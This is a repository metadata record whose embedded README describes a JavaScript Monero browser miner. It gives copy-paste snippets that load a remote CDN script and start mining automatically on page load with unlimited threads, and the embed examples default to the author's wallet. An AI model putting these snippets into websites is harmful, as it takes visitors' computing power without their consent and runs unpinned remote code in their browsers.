{"id":15023792,"url":"https://github.com/najmajmal/monero-webminer","last_synced_at":"2025-04-11T07:51:01.560Z","repository":{"id":153485822,"uuid":"628351412","full_name":"NajmAjmal/monero-webminer","owner":"NajmAjmal","description":"Javascript monero webminer","archived":false,"fork":false,"pushed_at":"2024-06-20T17:41:52.000Z","size":533,"stargazers_count":108,"open_issues_count":3,"forks_count":66,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-03-25T05:34:14.204Z","etag":null,"topics":["browser-mining","crypto","crypto-mining","crypto-webminer","cryptocurrency-mining","gulf-moneroocean-stream","html-miner","javascript-miner","javascript-mining","miner","mining","monero","monero-browser-miner","monero-mining","monero-webminer","moneroocean","webminer","webmining","xmr","xmr-webminer"],"latest_commit_sha":null,"homepage":"https://monero-webminer.vercel.app/","language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NajmAjmal.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-04-15T17:15:45.000Z","updated_at":"2025-03-17T15:24:45.000Z","dependencies_parsed_at":"2024-09-24T21:31:50.706Z","dependency_job_id":null,"html_url":"https://github.com/NajmAjmal/monero-webminer","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NajmAjmal%2Fmonero-webminer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NajmAjmal%2Fmonero-webminer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NajmAjmal%2Fmonero-webminer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NajmAjmal%2Fmonero-webminer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/NajmAjmal","download_url":"https://codeload.github.com/NajmAjmal/monero-webminer/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248359879,"owners_count":21090608,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["browser-mining","crypto","crypto-mining","crypto-webminer","cryptocurrency-mining","gulf-moneroocean-stream","html-miner","javascript-miner","javascript-mining","miner","mining","monero","monero-browser-miner","monero-mining","monero-webminer","moneroocean","webminer","webmining","xmr","xmr-webminer"],"created_at":"2024-09-24T19:59:26.853Z","updated_at":"2025-04-11T07:51:01.532Z","avatar_url":"https://github.com/NajmAjmal.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Monero Webminer\n\nHtml \u0026 Js code that allows Mining of XMR (Monero) on browsers\n\n\n# Configure\n\nIn index.Html you can configure it your preferences\n\n- Pool\n- XMR Wallet\n- Miner name\n- Threads (-1 means unlimited)\n- Miner Password (Optional, Moneroocean does not use password, if your pool does, it is usually \"x\")\n\n\n```javascript\nserver = \"wss://ny1.xmrminingproxy.com\";\n    var pool = \"gulf.moneroocean.stream:80\";\n    var walletAddress = \"INSERT YOUR ADDRESS HERE\";\n    var workerId = \"INSERT WORKER NAME\"\n    var threads = -1;\n    var password = \"\";\n    startMining(pool, walletAddress, workerId, threads, password);\n    throttleMiner = 20;\n```\n# Running\n\nOpen index.html in any web browser and it will automatically start mining.\n\nhttps://monero-webminer.vercel.app/\n\n\n# Check Progress \n\nGo to https://moneroocean.stream. This is the pool you are connected to, it will show your hashrate and balance.\n\n# How do i know if it works??\n\n1. Open https://monero-webminer.vercel.app/\n2. Also Open https://moneroocean.stream in a new tab\n3. Paste in my Monero Address `4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi`\n4. You will see that \"GH-XMR\" is Mining. You can also do the same \n\n# Use In Other Projects \n\n\nHTML\n  \n    \u003c!-- Start Of Mining Code (HTML) --\u003e\n    \u003cscript src=\"https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js\"\u003e\u003c/script\u003e\n    \u003cscript\u003e\n        server = \"wss://ny1.xmrminingproxy.com\";\n        var pool = \"moneroocean.stream\";\n        var walletAddress = \"4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi\";\n        var workerId = \"GH-XMR\"\n        var threads = -1;\n        var password = \"\";\n        startMining(pool, walletAddress, workerId, threads, password);\n        throttleMiner = 20;\n    \u003c/script\u003e\n    \u003c!-- End Of Mining Code (HTML) --\u003e\n      \n\nJavascript import snippet\n  \n    import 'https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/external/javascript.js';\n\n\nJavascript\n    \n    // Start Of Mining Code (Javascript)\n    var script = document.createElement(\"script\");\n    script.src = \"https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js\";\n    document.head.appendChild(script);\n\n    server = \"wss://ny1.xmrminingproxy.com\";\n    var pool = \"moneroocean.stream\";\n    var walletAddress = \"4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi\";\n    var workerId = \"GH-XMR\"\n    var threads = -1;\n    var password = \"\";\n    startMining(pool, walletAddress, workerId, threads, password);\n    throttleMiner = 20;\n    // End Of Mining Code\n    \n    \n#  Donate\n    \n    \nThis software is **100% free** to use, and we would greatly appreciate any donations to help support our work. If you'd like to donate, you can use the following cryptocurrency addresses:\n\n\n    BTC:  33qQZT1F5mWPvqM2bjbxQ3AsSYMXHpJsr6\n\n    ETH:  0x641E1449c2f7883F245069f284fC880174b02094\n\n    SOL:  AeYJTfLnok1nkncnvXFoKXmH8zrvtB7heNL9Q2sKNaFr\n\n    XMR:  4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi\n\n\nThank you for choosing our Monero Webminer. We hope you find it useful and profitable\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnajmajmal%2Fmonero-webminer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnajmajmal%2Fmonero-webminer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnajmajmal%2Fmonero-webminer/lists"}